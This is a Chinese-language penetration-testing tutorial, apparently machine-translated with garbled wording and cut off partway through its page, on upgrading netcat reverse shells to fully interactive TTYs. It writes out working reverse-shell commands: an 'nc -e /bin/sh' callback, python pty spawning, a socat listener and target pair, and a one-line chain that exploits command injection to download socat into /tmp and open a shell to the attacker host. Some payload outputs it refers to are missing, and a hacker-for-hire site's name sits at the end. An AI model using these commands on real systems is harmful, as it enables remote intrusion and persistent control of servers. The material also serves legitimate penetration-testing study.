作为一名浸透测验人员，最令人激动的莫过于netcat为咱们反弹回了一个shell衔接，以及经过id指令查看到一个令人满意的用户权限。但凡事总有意外，由于咱们获取的shell并不是一个具有完好交互的shell，因而或许会在运用过程中被挂起，乃至还或许会由于咱们的操作失误，例如不小心摁下了 “Ctrl-C”键，这将直接停止咱们的整个shell进程让白费而归。

除了没有正确处理SIGINT（信号）之外，这些“哑”shell还有其它许多缺陷：
一些指令如su和ssh，需求一个正确的终端才干运转
一般不显现STDERR
无法正常运用vim等文本编辑器
没有完结标签
没有向上箭头运用前史
没有jobcontrol等
长话短说尽管这些sehll也很棒，但我更倾向于在彻底互动的TTY中进行操作。下面我将为咱们共享一些用来“晋级”这些shell的技巧和办法。在正式开端之前我向咱们引荐一个叫Pentest Monkey的博客，以及Phineas Fisher的技能视频和writeup：
http://pentestmonkey.net/blog/post-exploitation-without-a-tty
https://www. *** .com/watch?v=oI_ZhFCS3AQ#t=25m53s
http://pastebin.com/raw/0SNSvyjJ
为了便于演示，以下一切的屏幕截图和指令都将在一台易受攻击的Web服务器（“VICTIM”）和用于捕获shell的Kali VM（“KALI”）上完结。
VICTIM IP: 10.0.3.7
KALI IP: 10.0.3.4
生成反向shell指令
咱们首要运用netcat来获取最常见的反向shell：
nc -e /bin/sh 10.0.3.4 4444
在kali虚拟机上咱们输入以下指令：
nc -lvp 4444
问题不在于每个服务器是否都装置了netcat，而且也不是每个版别的netcat都具有-e选项。Pentest Monkey有篇关于反向shell的cheatsheet，为咱们供给了一些不同的办法。但我更热衷于运用Metasploit的msfvenom一行生成指令。
Metasploit在“cmd/unix”下，有几个可用于生成单行绑定或反向shell的payload：

以上显现的一切payload都能够和msfvenom一同运用，而且咱们能够依据本身需求指定LHOST，LPORT或RPORT。例如，这里是一个不需求-e标志的netcat指令：

假如没有装置netcat，咱们还能够生成一个Perl的反向shell：

这些都能够经过运用netcat，并侦听指定的端口（4444）来捕获。
办法1：Python pty模块
关于现已装置了python的体系，咱们能够运用python供给的pty模块，只需求一行脚本就能够创立一个原生的终端，指令如下：
python -c 'import pty; pty.spawn("/bin/bash")'
在创立完结后，咱们此刻就能够运转su指令了。（而且界面提示也变得愈加友爱）

即便如此，但问题仍旧没有彻底的处理。例如SIGINT（Ctrl-C）仍然会封闭停止Netcat，完结标签或前史记录也仍旧没有，但这个办法在实践运用中也有必定的作用。
办法2：运用socat
socat是一个netcat上的代替东西，能够说是nc的增强版。咱们能够运用Socat经过TCP衔接传递完好的TTY。
假如你成功在方针机器装置了socat，那么咱们就能够经过以下指令来获取到一个彻底交互式的TTY反向shell：
在kali虚拟机咱们运转以下侦听指令：
socat file:`tty`,raw,echo=0 tcp-listen:4444 
在方针机器咱们运转：
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
假如方针体系没有装置socat你能够经过以下Github地址，下载相关的二进制静态文件进行装置：
https://github.com/andrew-d/static-binaries
经过指令注入缝隙，咱们能够将socat二进制文件下载到一个可写的目录，并经过chmod指令修正文件的履行权限，然后在一行中履行反向shell：
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 
此刻在kali，你将会获取到一个彻底交互式的TTY会话。它支撑完结标签，SIGINT/SIGSTP，vim，向上箭头运用前史等。

办法3：戏法般的Netcat晋级
在Phineas Fisher的技能视频中该办法被展现出来，在我看来感觉就像是戏法一般。根本操作就是在kali终端内设置一些stty选项，最终将“哑”netcat shell晋级到了一个彻底交互的TTY。
首要咱们运用与办法1相同的技能来生成PTY。一旦bash在PTY中运转，咱们按Ctrl-Z键将shell调至后台运转

[1] [2]  黑客接单网